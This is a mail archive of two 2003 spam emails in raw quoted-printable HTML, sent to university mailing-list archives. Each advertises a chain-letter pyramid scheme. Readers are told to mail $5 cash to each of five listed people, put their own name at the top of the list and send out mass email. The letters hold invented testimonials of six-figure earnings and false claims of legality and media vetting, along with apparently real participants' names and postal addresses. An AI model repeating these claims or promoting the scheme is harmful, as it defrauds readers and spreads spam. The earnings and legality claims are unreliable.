out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.</font><font fa=
ce=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>J & D Thiess=
en</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>P.O Box 329</font></=
font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Smith Alberta</font>=
</font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Canada TOG-2B0</font=
></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>S. L. Mendez</font></f=
ont></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 1007</font></font></b=
>
<br><b><font face=3D"Arial"><font size=3D-1>La Grande OR 97850-1007</font>=
</font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>E Golla</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>1696 Hemlock Road</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>Catawissa, PA 17820</font></fo=
nt></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>R.R</font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 18048</font></font></=
b>
<br><b><font face=3D"Arial"><font size=3D-1>Chicago IL 60618</font></font>=
</b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>G M Boland</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>353 Jonestown Road Suite 125</=
font></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Winston Salem NC 27104</font><=
/font></b></blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Dan Sondstrom,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Alberta, Canada</fo=
nt></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"I had receive=
d
this program before. I deleted it, but later I wondered if I should have
given it a try. Of course, I had no idea who to contact to get another
copy, so I had to wait until I was e-mailed again by someone else........1=
1
months passed then it luckily came again...... I did not delete this one!
I made more than $490,000 on my first try and all the money came within
22 weeks".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Susan De Suza,</font=
></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">New York, N.Y.</fon=
t></font></i></b></blockquote>
</blockquote>
</blockquote>

<hr width=3D"85%">
<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"It really is =
a
great opportunity to make relatively easy money with little cost to you.
I followed the simple instructions carefully and within 10 days the money
started to come in. My first month I made $ 20,560.00 and by the end of
third month my total cash count was $ 362,840.00. Life is beautiful, Thanx=

to the internet".</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Fred Dellaca,</font>=
</font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Westport, New Zeala=
nd</font></font></i></b></blockquote>

<hr width=3D"85%"></blockquote>

<center><b><font face=3D"Arial"><font size=3D+0>ORDER YOUR REPORTS TODAY, =
GET
STARTED ON YOUR ROAD TO</font></font></b>
<p><b><font face=3D"Arial"><font size=3D+2>FINANCIAL FREEDOM!</font></font=
></b></center>
</blockquote>

<center><i><font face=3D"Arial"><font size=3D-1>If you have any questions =
as
to the legality of this program, contact the Office of</font></font></i>
<br><i><font face=3D"Arial"><font size=3D-1>Associate Director for Marketi=
ng
Practices, Bureau of Consumer Protection, Washington, D.C</font>.</font></=
i>
<p>&nbsp;</center>
</td>
</tr>
</table></center>

<center><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#FFFFFF"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://203.95.1.160/remov=
e.html">remove
link here</a></font></font></font></center>

<div class=3D"ItalicBold"></div>

</body>
</html>
p tmpaxkwxnjsb tnvqaocivzy
ccroyu
e 

--B.9A70C71AEDB1--


From nhx9xovwnp@viessepompe.it Thu Sep 18 06:05:01 2003
Return-Path: <nhx9xovwnp@viessepompe.it>
Received: from 160.36.58.108 ([195.174.37.193])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h8IA49RY001935;
	Thu, 18 Sep 2003 06:04:27 -0400 (EDT)
Received: from [71.120.214.174]
	by 160.36.58.108 id LPJ3nKPT72N9;
	Thu, 18 Sep 2003 13:58:44 +0300
Message-ID: <2238x41-82mv6yb$-e--95@7g5lso84.8rpis>
From: "Anthony Whitehead" <nhx9xovwnp@viessepompe.it>
Reply-To: "Anthony Whitehead" <nhx9xovwnp@viessepompe.it>
To: <anon@netlib2.cs.utk.edu>, <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: More testimonials later but first... cohth  waenxul t
Date: Thu, 18 Sep 03 13:58:44 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_0_1__0F3.E5739A"
X-Priority: 3
X-MSMail-Priority: Normal


--_0_1__0F3.E5739A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>chain1</title>
</head>
<body text=3D"#000000" bgcolor=3D"#99FF99" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
<center><b><font face=3D"Arial,Helvetica" size=3D+3 color=3D"#3333FF">If I=
 could show you how to make</font></b>
<br><b><font face=3D"Arial,Helvetica" color=3D"#FF0000" size=3D+4>$50,000<=
/font></b>
<br><b><font face=3D"Arial,Helvetica" color=3D"#3333FF" size=3D+2>or more,=
 would you give me 2 minutes of your time?</font></b></center>
<P>
<center><table BORDER=3D5 CELLSPACING=3D0 CELLPADDING=3D20 WIDTH=3D"650" B=
GCOLOR=3D"#FFFFCC" >
<tr><td>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"55=
0" BGCOLOR=3D"#FFFF00" >
<tr><td>
<center><b><font face=3D"Times New Roman,Times">Learn how to start your ow=
n multilevel marketing business on the internet.<br>Its <font size=3D+1>si=
mple</font>, its <font size=3D+1>easy</font>, its <font size=3D+1>honest</=
font>, and its <font size=3D+1>legal</font>.&nbsp; Anyone can do it.</font=
></b>
<br><b><font face=3D"Times New Roman,Times">All you need is a computer and=
 access to the internet.</font></center>
</td>
</tr>
</table></center>
<P><i><font face=3D"Arial,Helvetica">Will all this information really make=
 you wealthy? I have to be frank with you: I don't know how rich you'll ge=
t once you listen to, absorb and begin to use the secrets I'll show you. I=
'm giving you a hammer. Whether you build a doghouse or a castle is none o=
f my business. My suggestion: <font size=3D+1>Think BIG!</font> Isn't it t=
ime?</font></i>
<P><center><b><font face=3D"Arial,Helvetica"><font color=3D"#FF0000"><font=
 size=3D+2>Don't regret not taking action!</font></font></font></b>
<P>
<P><b><font face=3D"Arial,Helvetica"><font color=3D"#000000"><font size=3D=
+1>A One Time Investment Of $25 Plus This Simple Technology <br> Could Mak=
e You Financially Secure For Life!</font></font></font></b></center>

<center><table BORDER=3D6 CELLSPACING=3D0 CELLPADDING=3D7 WIDTH=3D"100=
%" BGCOLOR=3D"#FFFFFF" class=3D"center" >
<tr><td>
<P><center><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENC=
E</font></b></center>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to make at least $500,000 every 4 to 5 months <br> easily and comfortably,=
 please read the following...<BR>THEN READ IT AGAIN and AGAIN !!!</font></=
font></b></center>

<hr width=3D"85%">
<center>&nbsp;
<br><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fo=
nt></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>
<b><i><u><font face=3D"Arial"></font></u></i></b>
<p><b><i><font face=3D"Arial">&nbsp;</font></i></b>
<br><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>
<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font>
<center>&nbsp;
<br>
<hr WIDTH=3D"80%">
<b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>
<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b>
<br>
<hr WIDTH=3D"80%">
<br><b><font face=3D"Arial">&nbsp;&nbsp;</font></b></center>
<font face=3D"Arial">You will need all 5 reports so that you can save them=

on your computer and resell them.</font>
<center>&nbsp;
<br><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>
&nbsp;
<br><font face=3D"Arial">Within a few days <b>you will receive, via e-mail=
,
each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<br>&nbsp;
<br><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will lose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!</u></b></fon=
t>
<br><b><font face=3D"Arial">&nbsp;</font></b>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 WIDTH=3D"90=
%" BGCOLOR=3D"#FFCC33" >
<tr>
<td>
<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b></=
center>
</td>
</tr>
</table></center>

<center>&nbsp;
<br><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such an=
d
you will be VERY profitable in a short period of time</font></font></i></b=
></center>
<font face=3D"Arial">After you have ordered all 5 reports, take this adver=
tisement
and REMOVE the name &amp; address of the person in REPORT # 5. This person=

has made it through the cycle and is no doubt counting their fortune. Emai=
l
them and ask that's what I always did.Move the name &amp; address in REPOR=
T
# 4 down TO REPORT # 5.Move the name &amp; address in REPORT # 3 down TO
REPORT # 4.Move the name &amp; address in REPORT # 2 down TO REPORT # 3.Mo=
ve
the name &amp; address in REPORT # 1 down TO REPORT # 2. Insert YOUR name
&amp; address in the REPORT # 1 Position.</font>
<center>&nbsp;
<br>&nbsp;
<br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &amp;=

address <b>ACCURATELY</b></font>
<br><font face=3D"Arial"><font size=3D-1>(Just cut and paste! This is crit=
ical
to <b>YOUR
</b>success. Take this entire letter,</font></font>
<br><font face=3D"Arial"><font size=3D-1>with the modified list of names, =
and
save it on your computer.)</font></font>
<br>&nbsp;
<br><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cent=
er>
<font face=3D"Arial"><b>Save this on a disk as well just in case you loose=

any data</b>. To assist you with marketing your business on the internet,
the 5 reports you purchase will provide you with invaluable marketing info=
rmation
which includes how to send bulk e-mails legally, where to find thousands
of free classified ads and much more. There are 2 Primary methods to get
this venture going:</font>
<br><font face=3D"Arial">&nbsp;</font>
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D1 WIDTH=3D"54=
0" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY</fo=
nt></b>
<p><font face=3D"Arial">Let's say that you decide to start small, just to
see how it goes, and we will assume You and those involved send out only
5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
